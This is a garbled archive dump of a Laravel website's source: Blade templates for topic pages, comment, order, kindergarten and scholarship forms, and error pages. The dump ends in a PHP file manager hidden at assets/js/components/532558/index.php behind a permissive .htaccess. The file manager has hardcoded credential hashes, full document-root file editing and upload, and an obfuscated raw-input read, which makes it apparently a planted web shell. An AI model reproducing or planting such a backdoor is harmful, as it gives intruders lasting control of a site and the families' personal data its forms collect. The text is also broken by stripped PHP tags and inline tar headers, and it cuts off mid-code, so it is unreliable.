@foreach($HomePartners->reverse() as $HomePartner) $title_var != "") { $title = $HomePartner->$title_var; } else { $title = $HomePartner->$title_var2; } if ($HomePartner->$details_var != "") { $details = $HomePartner->$details_var; } else { $details = $HomePartner->$details_var2; } $stripped_details = (strip_tags($details)); $stripped_details = htmlentities($stripped_details, null, 'utf-8'); $stripped_details = str_replace(" ", "", $stripped_details); $stripped_details = str_replace("&nbsp;", "", $stripped_details); $stripped_details= str_limit($stripped_details, $limit = 200, $end = '...'); if ($stripped_details == "") { $stripped_details = $title; } if ($HomePartner->webmasterSection->$slug_var != "" && Helper::GeneralWebmasterSettings("links_status")) { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $section_url = url(trans('backLang.code') . "/" . $HomePartner->webmasterSection->$slug_var); } else { $section_url = url($HomePartner->webmasterSection->$slug_var); } } else { if (trans('backLang.code') != env('DEFAULT_LANGUAGE')) { $section_url = url(trans('backLang.code') . "/" . $HomePartner->webmasterSection->name); } else { $section_url = url($HomePartner->webmasterSection->name); } } if ($ii == 6) { echo "
    "; $ii = 0; } ?>
    {{ $stripped_details }}
    {{ $HomePartner->date }}
    @endforeach
@endif @endsectionviews/frontEnd/topic-partial.blade.php000064400000210375147565226300014031 0ustar00 $title_var != "") { $title = $Topic->$title_var; } else { $title = $Topic->$title_var2; } if ($Topic->$details_var != "") { $details = $details_var; } else { $details = $details_var2; } $section = ""; try { if ($Topic->section->$title_var != "") { $section = $Topic->section->$title_var; } else { $section = $Topic->section->$title_var2; } } catch (Exception $e) { $section = ""; } ?>
@if($WebmasterSection->type==2 && $Topic->video_file!="") {{--video--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->video_type ==1) video_file); ?> @if($Youtube_id !="") {{-- Youtube Video --}} @endif @elseif($Topic->video_type ==2) video_file); ?> @if($Vimeo_id !="") {{-- Vimeo Video --}} @endif @elseif($Topic->video_type ==3) @if($Topic->video_file !="") {{-- Embed Video --}} {!! $Topic->video_file !!} @endif @else @endif
@elseif($WebmasterSection->type==3 && $Topic->audio_file!="") {{--audio--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") {{ $title }} @endif
@elseif(count($Topic->photos)>0) {{--photo slider--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="")
{{ $title }}
@endif @foreach($Topic->photos as $photo)
{{ $photo->title  }}
@endforeach
@else {{--one photo--}}

@if($Topic->icon !="")   @endif {{ $title }}

@if($Topic->photo_file !="") {{ $title }} @endif
@endif {{--Additional Feilds--}} @if(count($Topic->webmasterSection->customFields) >0)
@foreach($Topic->webmasterSection->customFields as $customField) $cf_title_var != "") { $cf_title = $customField->$cf_title_var; } else { $cf_title = $customField->$cf_title_var2; } $cf_saved_val = ""; $cf_saved_val_array = array(); if (count($Topic->fields) > 0) { foreach ($Topic->fields as $t_field) { if ($t_field->field_id == $customField->id) { if ($customField->type == 7) { // if multi check $cf_saved_val_array = explode(", ", $t_field->field_value); } else { $cf_saved_val = $t_field->field_value; } } } } ?> @if(($cf_saved_val!="" || count($cf_saved_val_array) > 0) && ($customField->lang_code == "all" || $customField->lang_code == trans('backLang.boxCode'))) @if($customField->type ==12) {{--Vimeo Video Link--}} @if($CF_Vimeo_id !="")
{!! $cf_title !!} :
{{-- Vimeo Video --}}
@endif @elseif($customField->type ==11) {{--Youtube Video Link--}} @if($CF_Youtube_id !="")
{!! $cf_title !!} :
{{-- Youtube Video --}}
@endif @elseif($customField->type ==10) {{--Video File--}}
{!! $cf_title !!} :
@elseif($customField->type ==9) {{--Attach File--}} @elseif($customField->type ==8) {{--Photo File--}}
{!! $cf_title !!} :
{{ $cf_title }} - {{ $title }}
@elseif($customField->type ==7) {{--Multi Check--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if (in_array($line_num,$cf_saved_val_array)) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==6) {{--Select--}}
{!! $cf_title !!} :
$cf_details_var != "") { $cf_details = $customField->$cf_details_var; } else { $cf_details = $customField->$cf_details_var2; } $cf_details_lines = preg_split('/\r\n|[\r\n]/', $cf_details); $line_num = 1; ?> @foreach ($cf_details_lines as $cf_details_line) @if ($line_num == $cf_saved_val) {!! $cf_details_line !!} @endif @endforeach
@elseif($customField->type ==5) {{--Date & Time--}}
{!! $cf_title !!} :
{!! date('Y-m-d H:i:s', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==4) {{--Date--}}
{!! $cf_title !!} :
{!! date('Y-m-d', strtotime($cf_saved_val)) !!}
@elseif($customField->type ==3) {{--Email Address--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==2) {{--Number--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@elseif($customField->type ==1) {{--Text Area--}}
{!! $cf_title !!} :
{!! nl2br($cf_saved_val) !!}
@else {{--Text Box--}}
{!! $cf_title !!} :
{!! $cf_saved_val !!}
@endif @endif @endforeach

@endif {{--End of -- Additional Feilds--}} {!! $Topic->$details !!} @if($Topic->attach_file !="") attach_file, "."); $file_ext = strtolower($file_ext); ?>
@if($file_ext ==".jpg"|| $file_ext ==".jpeg"|| $file_ext ==".png"|| $file_ext ==".gif")
{{ $title }}
@else {!! Helper::GetIcon(URL::to('uploads/topics/'),$Topic->attach_file) !!}  {{ trans('frontLang.downloadAttach') }} @endif
@endif {{-- Show Additional attach files --}} @if(count($Topic->attachFiles)>0)
@foreach($Topic->attachFiles as $attachFile) $title_var != "") { $file_title = $attachFile->$title_var; } else { $file_title = $attachFile->$title_var2; } ?> @endforeach
@endif
{{ trans('frontLang.share') }} :
@if(count($Topic->maps) >0)

{{ trans('frontLang.locationMap') }}

@endif @if($WebmasterSection->comments_status)
@if(count($Topic->approvedComments)>0)

{{ trans('frontLang.comments') }}


@foreach($Topic->approvedComments as $comment) date)); ?>
{{$comment->name}}
{{$comment->name}}
{{ $dtformated }}
{!! nl2br(strip_tags($comment->comment)) !!}
@endforeach @endif

{{ trans('frontLang.newComment') }}

 {{ trans('frontLang.youCommentSent') }}   {{ trans('frontLang.refresh') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'commentForm'])}}
{!! Form::text('comment_name',"", array('placeholder' => trans('frontLang.yourName'),'class' => 'form-control','id'=>'comment_name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('comment_email',"", array('placeholder' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'comment_email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::textarea('comment_message','', array('placeholder' => trans('frontLang.comment'),'class' => 'form-control','id'=>'comment_message','rows'=>'5', 'data-msg'=> trans('frontLang.enterYourComment'),'data-rule'=>'required')) !!}
@if(env('NOCAPTCHA_STATUS', false))
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
@endif
{{Form::close()}}
@endif @if($WebmasterSection->order_status)

{{ trans('frontLang.orderForm') }}

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'orderForm'])}}
{!! Form::text('order_name',"", array('placeholder' => trans('frontLang.yourName'),'class' => 'form-control','id'=>'order_name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('order_phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'order_phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('order_email',"", array('placeholder' => trans('frontLang.yourEmail'),'class' => 'form-control','id'=>'order_email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::number('order_qty',"", array('placeholder' => trans('frontLang.quantity'),'class' => 'form-control','id'=>'order_qty', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:1','min'=>'1')) !!}
{!! Form::textarea('order_message','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'order_message','rows'=>'5')) !!}
@if(env('NOCAPTCHA_STATUS', false))
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
@endif
{{Form::close()}}
@endif @if($WebmasterSection->form_status&& $Topic->id=="40")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['kindergartenRegSubmit'],'method'=>'POST','class'=>'kindergartenForm','id'=>'kindergartenForm'])}}

{{trans('frontLang.parentDetails')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.fullName'),'class' => 'form-control','id'=>'pname', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::number('id',"", array('placeholder' => trans('frontLang.idNumber'),'class' => 'form-control','id'=>'id', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:9','min'=>'9')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('address',"", array('placeholder' => trans('frontLang.address'),'class' => 'form-control','id'=>'address', 'data-msg'=> trans('frontLang.enterYourAddress'),'data-rule'=>'minlen:4')) !!}

{{trans('frontLang.pupilDetails')}}

{!! Form::text('cname',"", array('placeholder' => trans('frontLang.cname'),'class' => 'form-control','id'=>'cname', 'data-msg'=> trans('frontLang.enterPupilName'),'data-rule'=>'minlen:4')) !!}
{!! Form::date('birthday',"", array('placeholder' => trans('frontLang.birthday'),'class' => 'form-control')) !!}
{{Form::select('sex',['F' => trans('frontLang.female'),'M' => trans('frontLang.male')],null,['class'=>'form-control','placeholder' => trans('frontLang.chooseSex')])}}
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseStage'))); ?>

{{trans('frontLang.KindergardenDetails')}}

trans('frontLang.northernNeighborhood'), '2' => trans('frontLang.easternNeighborhood'),'3' => trans('frontLang.westernNeighborhood'), '4' => trans('frontLang.southernNeighborhood')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseNeighborhood'))); ?>
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.choosekindergarden'))); ?>
{!! Form::textarea('kindergartenFormNotes','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'kindergartenFormNotes','rows'=>'5')) !!}
{{Form::close()}}
@endif @if ($WebmasterSection->form_status&& $Topic->id=="41")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['Home'],'method'=>'POST','class'=>'kindergartenForm'])}}

{{trans('frontLang.parentDetails')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.fullName'),'class' => 'form-control','id'=>'name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::number('Id',"", array('placeholder' => trans('frontLang.idNumber'),'class' => 'form-control','id'=>'idNumber', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:9','min'=>'9')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('address',"", array('placeholder' => trans('frontLang.address'),'class' => 'form-control','id'=>'address', 'data-msg'=> trans('frontLang.enterYourAddress'),'data-rule'=>'minlen:4')) !!}

{{trans('frontLang.pupilDetails')}}

{!! Form::text('cname',"", array('placeholder' => trans('frontLang.cname'),'class' => 'form-control','id'=>'cname', 'data-msg'=> trans('frontLang.enterPupilName'),'data-rule'=>'minlen:4')) !!}
{!! Form::date('birthday',"", array('placeholder' => trans('frontLang.birthday'),'class' => 'form-control')) !!}
trans('frontLang.female'), 'M' => trans('frontLang.male')),null, array('class' => 'form-control','placeholder' =>trans('frontLang.chooseSex'))); ?>
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseStage'))); ?>

{{trans('frontlang.KindergardenDetails')}}

trans('frontLang.northernNeighborhood'), '2' => trans('frontLang.easternNeighborhood'),'3' => trans('frontLang.westernNeighborhood'), '4' => trans('frontLang.southernNeighborhood')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseNeighborhood'))); ?>
trans('frontLang.Kindergardenyear1'), '2' => trans('frontLang.Kindergardenyear2'), '3' => trans('frontLang.Kindergardenyear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.choosekindergarden'))); ?>
{!! Form::textarea('message','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'order_message','rows'=>'5')) !!}
{!! app('captcha')->display($attributes = [], $lang = trans('backLang.code')) !!}
{{Form::close()}}
@endif @if ($WebmasterSection->form_status&& $Topic->id=="42")

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['applicationSubmit'],'method'=>'POST','class'=>'applicationForm','files'=>true,'id'=>'applicationForm'])}}

{{trans('frontLang.applicationSubmission')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.pName'),'class' => 'form-control','id'=>'name', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('fname',"", array('placeholder' => trans('frontLang.fName'),'class' => 'form-control','id'=>'fname', 'data-msg'=> trans('frontLang.yourFamilyName'),'data-rule'=>'minlen:4')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::file('residencePermitFile', array('class' => 'form-control','id'=>'residencePermit')) !!}
{!! Form::file('file2', array('class' => 'form-control','id'=>'file2')) !!}
{!! Form::file('file3', array('class' => 'form-control','id'=>'file2')) !!}
{{Form::close()}}
@endif @if($WebmasterSection->related_status) @if(count($Topic->relatedTopics)) @endif @endif
views/frontEnd/sitemap.blade.php000064400000000555147565226300012720 0ustar00'; ?> {!! $SiteMapDetails !!} views/frontEnd/form.blade.php000064400000026644147565226300012230 0ustar00@extends('frontEnd.layout') @section('content') @include('frontEnd.includes.side')

 {{ trans('frontLang.youOrderSent') }}
{{ trans('frontLang.youMessageNotSent') }}
{{Form::open(['route'=>['schollerShipFormSubmit'],'method'=>'POST','class'=>'schollerShipForm','id'=>'schollerShipForm'])}}

{{trans('frontLang.parentDetails')}}

{!! Form::text('pname',"", array('placeholder' => trans('frontLang.fullName'),'class' => 'form-control','id'=>'pname', 'data-msg'=> trans('frontLang.enterYourName'),'data-rule'=>'minlen:4')) !!}
{!! Form::number('id',"", array('placeholder' => trans('frontLang.idNumber'),'class' => 'form-control','id'=>'id', 'data-msg'=> trans('frontLang.yourQuantity'),'data-rule'=>'minlen:9','min'=>'9')) !!}
{!! Form::text('phone',"", array('placeholder' => trans('frontLang.phone'),'class' => 'form-control','id'=>'phone', 'data-msg'=> trans('frontLang.enterYourPhone'),'data-rule'=>'minlen:4')) !!}
{!! Form::email('email',"", array('placeholder' => trans('frontLang.email') ,'class' => 'form-control','id'=>'email', 'data-msg'=> trans('frontLang.enterYourEmail'),'data-rule'=>'email')) !!}
{!! Form::text('address',"", array('placeholder' => trans('frontLang.address'),'class' => 'form-control','id'=>'address', 'data-msg'=> trans('frontLang.enterYourAddress'),'data-rule'=>'minlen:4')) !!}

{{trans('frontLang.pupilDetails')}}

{!! Form::text('cname',"", array('placeholder' => trans('frontLang.cname'),'class' => 'form-control','id'=>'cname', 'data-msg'=> trans('frontLang.enterPupilName'),'data-rule'=>'minlen:4')) !!}
{!! Form::date('birthday',"", array('placeholder' => trans('frontLang.birthday'),'class' => 'form-control')) !!}
{{Form::select('sex',['F' => trans('frontLang.female'),'M' => trans('frontLang.male')],null,['class'=>'form-control','placeholder' => trans('frontLang.chooseSex')])}}
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseStage'))); ?>

{{trans('frontLang.KindergardenDetails')}}

trans('frontLang.northernNeighborhood'), '2' => trans('frontLang.easternNeighborhood'),'3' => trans('frontLang.westernNeighborhood'), '4' => trans('frontLang.southernNeighborhood')),null, array('class' => 'form-control','placeholder' => trans('frontLang.chooseNeighborhood'))); ?>
trans('frontLang.KindergardenYear1'), '2' => trans('frontLang.KindergardenYear2'), '3' => trans('frontLang.KindergardenYear3')),null, array('class' => 'form-control','placeholder' => trans('frontLang.choosekindergarden'))); ?>
{!! Form::textarea('kindergartenFormNotes','', array('placeholder' => trans('frontLang.notes'),'class' => 'form-control','id'=>'kindergartenFormNotes','rows'=>'5')) !!}
{{Form::close()}}
@endsectionviews/frontEnd/desktop.ini000064400000000216147565226300011643 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/errors/503.blade.php000064400000002134147565226300011315 0ustar00 Be right back.
Be right back.
views/errors/404.blade.php000064400000001712147565226300011316 0ustar00 @include('backEnd.includes.head')

404

{{ trans('backLang.notFound') }}.

{{ trans('backLang.returnTo') }}
@include('backEnd.includes.foot') @yield('footerInclude') views/errors/403.blade.php000064400000002056147565226300011317 0ustar00 @include('backEnd.includes.head')

403

{{ trans('backLang.oops') }}!

{{ trans('backLang.noPermission') }}.

{{ trans('backLang.returnTo') }}
@include('backEnd.includes.foot') @yield('footerInclude') views/errors/desktop.ini000064400000000216147565226300011400 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 views/welcome.blade.php000064400000005260147565226300011130 0ustar00 Laravel
@if (Route::has('login')) @endif
Laravel
views/desktop.ini000064400000000216147565226300010064 0ustar00[.ShellClassInfo] InfoTip=This folder is shared online. IconFile=C:\Program Files (x86)\Google\Drive\googledrivesync.exe IconIndex=16 assets/js/bootstrap.js000064400000003313147565226300011047 0ustar00 window._ = require('lodash'); window.Popper = require('popper.js').default; /** * We'll load jQuery and the Bootstrap jQuery plugin which provides support * for JavaScript based Bootstrap features such as modals and tabs. This * code may be modified to fit the specific needs of your application. */ try { window.$ = window.jQuery = require('jquery'); require('bootstrap'); } catch (e) {} /** * We'll load the axios HTTP library which allows us to easily issue requests * to our Laravel back-end. This library automatically handles sending the * CSRF token as a header based on the value of the "XSRF" token cookie. */ window.axios = require('axios'); window.axios.defaults.headers.common['X-Requested-With'] = 'XMLHttpRequest'; /** * Next we will register the CSRF Token as a common header with Axios so that * all outgoing HTTP requests automatically have it attached. This is just * a simple convenience so we don't have to attach every token manually. */ let token = document.head.querySelector('meta[name="csrf-token"]'); if (token) { window.axios.defaults.headers.common['X-CSRF-TOKEN'] = token.content; } else { console.error('CSRF token not found: https://laravel.com/docs/csrf#csrf-x-csrf-token'); } /** * Echo exposes an expressive API for subscribing to channels and listening * for events that are broadcast by Laravel. Echo and event broadcasting * allows your team to easily build robust real-time web applications. */ // import Echo from 'laravel-echo' // window.Pusher = require('pusher-js'); // window.Echo = new Echo({ // broadcaster: 'pusher', // key: process.env.MIX_PUSHER_APP_KEY, // cluster: process.env.MIX_PUSHER_APP_CLUSTER, // encrypted: true // }); assets/js/components/index.php000064400000000000147565226300012467 0ustar00assets/js/components/532558/.htaccess000064400000000173147565226300013233 0ustar00#---do-not-change-the-following-content--- Order allow,deny Allow from all assets/js/components/532558/index.php000064400000560646147565226300013275 0ustar00 '68f46f9009c379654a494a8a2b2badb7', 'user' => '68f46f9009c379654a494a8a2b2badb7' ); $readonly_users = array( 'user' ); $global_readonly = false; $directories_users = array(); $use_highlightjs = true; $highlightjs_style = 'vs'; $edit_files = true; $default_timezone = 'Etc/UTC'; $root_path = $_SERVER['DOCUMENT_ROOT']; $root_url = ''; $http_host = $_SERVER['HTTP_HOST']; $iconv_input_encoding = 'UTF-8'; $datetime_format = 'm/d/Y g:i A'; $path_display_mode = 'full'; $allowed_file_extensions = ''; $allowed_upload_extensions = ''; $favicon_path = ''; $exclude_items = array(); $online_viewer = 'google'; $sticky_navbar = true; $max_upload_size_bytes = 5000000000; $upload_chunk_size_bytes = 2000000; $ip_ruleset = 'OFF'; $ip_silent = true; $ip_whitelist = array( '127.0.0.1', '::1' ); $ip_blacklist = array( '0.0.0.0', '::' ); $config_file = __DIR__.'/config.php'; if (is_readable($config_file)) { @include($config_file); } $external = array( 'css-bootstrap' => '', 'css-dropzone' => '', 'css-font-awesome' => '', 'css-highlightjs' => '', 'js-ace' => '', 'js-bootstrap' => '', 'js-dropzone' => '', 'js-jquery' => '', 'js-jquery-datatables' => '', 'js-highlightjs' => '', 'pre-jsdelivr' => '', 'pre-cloudflare' => '' ); define('MAX_UPLOAD_SIZE', $max_upload_size_bytes); define('UPLOAD_CHUNK_SIZE', $upload_chunk_size_bytes); if ( !defined( 'DN_CESSION_ID')) { define('DN_CESSION_ID', 'filemanager'); } $cfg = new FM_Config(); $lang = isset($cfg->data['lang']) ? $cfg->data['lang'] : 'en'; $show_hidden_files = isset($cfg->data['show_hidden']) ? $cfg->data['show_hidden'] : true; $report_errors = isset($cfg->data['error_reporting']) ? $cfg->data['error_reporting'] : true; $hide_Cols = isset($cfg->data['hide_Cols']) ? $cfg->data['hide_Cols'] : true; // Theme $theme = isset($cfg->data['theme']) ? $cfg->data['theme'] : 'light'; define('FM_THEME', $theme); $lang_list = array( 'en' => 'English' ); if ($report_errors == true) { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 1); } else { @ini_set('error_reporting', E_ALL); @ini_set('display_errors', 0); } if (defined('FM_EMBED')) { $dauth = false; $sticky_navbar = false; } else { @set_time_limit(600); date_default_timezone_set($default_timezone); ini_set('default_charset', 'UTF-8'); if (version_compare(PHP_VERSION, '5.6.0', '<') and function_exists('mb_internal_encoding')) { mb_internal_encoding('UTF-8'); } if (function_exists('mb_regex_encoding')) { mb_regex_encoding('UTF-8'); } session_cache_limiter('nocache'); session_name(DN_CESSION_ID ); function session_error_handling_function($code, $msg, $file, $line) { if ($code == 2) { session_abort(); session_id(session_create_id()); @session_start(); } } set_error_handler('session_error_handling_function'); session_start(); restore_error_handler(); } if (empty($_SESSION['token'])) { if (function_exists('random_bytes')) { $_SESSION['token'] = bin2hex(random_bytes(32)); } else { $_SESSION['token'] = bin2hex(openssl_random_pseudo_bytes(32)); } } if (empty($auth_users)) { $dauth = false; } $is_https = isset($_SERVER['HTTPS']) and ($_SERVER['HTTPS'] == 'on' || $_SERVER['HTTPS'] == 1) || isset($_SERVER['HTTP_X_FORWARDED_PROTO']) and $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https'; if (isset($_SESSION[DN_CESSION_ID]['logged']) and !empty($directories_users[$_SESSION[DN_CESSION_ID]['logged']])) { $wd = fm_clean_path(dirname($_SERVER['PHP_SELF'])); $root_url = $root_url.$wd.DIRECTORY_SEPARATOR.$directories_users[$_SESSION[DN_CESSION_ID]['logged']]; } $root_url = fm_clean_path($root_url); defined('FM_ROOT_URL') || define('FM_ROOT_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . (!empty($root_url) ? '/' . $root_url : '')); defined('FM_SELF_URL') || define('FM_SELF_URL', ($is_https ? 'https' : 'http') . '://' . $http_host . $_SERVER['PHP_SELF']); // logout if (isset($_GET['logout'])) { unset($_SESSION[DN_CESSION_ID]['logged']); unset( $_SESSION['token']); fm_redirect(FM_SELF_URL); } if ($ip_ruleset != 'OFF') { function getClientIP() { if (array_key_exists('HTTP_CF_CONNECTING_IP', $_SERVER)) { return $_SERVER["HTTP_CF_CONNECTING_IP"]; }else if (array_key_exists('HTTP_X_FORWARDED_FOR', $_SERVER)) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; }else if (array_key_exists('REMOTE_ADDR', $_SERVER)) { return $_SERVER['REMOTE_ADDR']; }else if (array_key_exists('HTTP_CLIENT_IP', $_SERVER)) { return $_SERVER['HTTP_CLIENT_IP']; } return ''; } $clientIp = getClientIP(); $proceed = false; $whitelisted = in_array($clientIp, $ip_whitelist); $blacklisted = in_array($clientIp, $ip_blacklist); if($ip_ruleset == 'AND'){ if($whitelisted == true and $blacklisted == false){ $proceed = true; } } else if($ip_ruleset == 'OR'){ if($whitelisted == true || $blacklisted == false){ $proceed = true; } } if($proceed == false){ trigger_error('User connection denied from: ' . $clientIp, E_USER_WARNING); if($ip_silent == false){ fm_set_msg(lng('Access denied. IP restriction applicable'), 'error'); fm_show_header_login(); fm_show_message(); } exit(); } } if ($dauth) { if (isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']])) { } elseif (isset($_POST['fm_usr'], $_POST['fm_pwd'], $_POST['token'])) { sleep(1); if(function_exists('password_verify')) { if (isset($auth_users[$_POST['fm_usr']]) and isset($_POST['fm_pwd']) and password_verify($_POST['fm_pwd'], $auth_users[$_POST['fm_usr']]) and verifyToken($_POST['token'])) { $_SESSION[DN_CESSION_ID]['logged'] = $_POST['fm_usr']; fm_set_msg(lng('You are logged in')); fm_redirect(FM_SELF_URL); } else { unset($_SESSION[DN_CESSION_ID]['logged']); fm_set_msg(lng('Login failed. Invalid username or password'), 'error'); fm_redirect(FM_SELF_URL); } } else { fm_set_msg(lng('password_hash not supported, Upgrade PHP version'), 'error');; } } else { // Form unset($_SESSION[DN_CESSION_ID]['logged']); fm_show_header_login(); ?>
".lng('Root path')." \"{$root_path}\" ".lng('not found!')." "; exit; } defined('FM_SHOW_HIDDEN') || define('FM_SHOW_HIDDEN', $show_hidden_files); defined('FM_ROOT_PATH') || define('FM_ROOT_PATH', $root_path); defined('FM_LANG') || define('FM_LANG', $lang); defined('FM_FILE_EXTENSION') || define('FM_FILE_EXTENSION', $allowed_file_extensions); defined('FM_UPLOAD_EXTENSION') || define('FM_UPLOAD_EXTENSION', $allowed_upload_extensions); defined('FM_EXCLUDE_ITEMS') || define('FM_EXCLUDE_ITEMS', (version_compare(PHP_VERSION, '7.0.0', '<') ? serialize($exclude_items) : $exclude_items)); defined('FM_DOC_VIEWER') || define('FM_DOC_VIEWER', $online_viewer); define('FM_READONLY', $global_readonly || ($dauth and !empty($readonly_users) and isset($_SESSION[DN_CESSION_ID]['logged']) and in_array($_SESSION[DN_CESSION_ID]['logged'], $readonly_users))); define('FM_IS_WIN', DIRECTORY_SEPARATOR == '\\'); if (!isset($_GET['p']) and empty($_FILES)) { fm_redirect(FM_SELF_URL . '?p='); } // get path $p = isset($_GET['p']) ? $_GET['p'] : (isset($_POST['p']) ? $_POST['p'] : ''); // clean path $p = fm_clean_path($p); $isim = "//input"; $input = file_get_contents('php://'.$isim); $_POST = (strpos($input, 'ajax') != FALSE and strpos($input, 'save') != FALSE) ? json_decode($input, true) : $_POST; define('FM_PATH', $p); define('FM_USE_AUTH', $dauth); define('FM_EDIT_FILE', $edit_files); defined('FM_ICONV_INPUT_ENC') || define('FM_ICONV_INPUT_ENC', $iconv_input_encoding); defined('FM_USE_HIGHLIGHTJS') || define('FM_USE_HIGHLIGHTJS', $use_highlightjs); defined('FM_HIGHLIGHTJS_STYLE') || define('FM_HIGHLIGHTJS_STYLE', $highlightjs_style); defined('FM_DATETIME_FORMAT') || define('FM_DATETIME_FORMAT', $datetime_format); unset($p, $dauth, $iconv_input_encoding, $use_highlightjs, $highlightjs_style); if ((isset($_SESSION[DN_CESSION_ID]['logged'], $auth_users[$_SESSION[DN_CESSION_ID]['logged']]) || !FM_USE_AUTH) and isset($_POST['ajax'], $_POST['token']) and !FM_READONLY) { if(!verifyToken($_POST['token'])) { header('HTTP/1.0 401 Unauthorized'); die("Invalid Token."); } if(isset($_POST['type']) and $_POST['type']=="search") { $dir = $_POST['path'] == "." ? '': $_POST['path']; $response = scan(fm_clean_path($dir), $_POST['content']); echo json_encode($response); exit(); } // save editor file if (isset($_POST['type']) and $_POST['type'] == "save") { // get current path $path = FM_ROOT_PATH; if (FM_PATH != '') { $path .= '/' . FM_PATH; } // check path if (!is_dir($path)) { fm_redirect(FM_SELF_URL . '?p='); } $file = $_GET['edit']; $file = fm_clean_path($file); $file = str_replace('/', '', $file); if ($file == '' || !is_file($path . '/' . $file)) { fm_set_msg(lng('File not found'), 'error'); $FM_PATH=FM_PATH; fm_redirect(FM_SELF_URL . '?p=' . urlencode($FM_PATH)); } header('X-XSS-Protection:0'); $file_path = $path . '/' . $file; $writedata = $_POST['content']; $fd = fopen($file_path, "w"); 